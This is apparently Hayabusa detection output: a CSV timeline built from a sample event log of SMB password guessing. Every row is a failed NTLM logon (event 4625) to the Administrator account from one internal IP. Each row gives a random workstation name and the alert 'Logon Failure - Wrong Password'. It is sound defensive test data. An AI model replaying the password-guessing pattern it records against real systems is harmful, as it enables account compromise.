2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
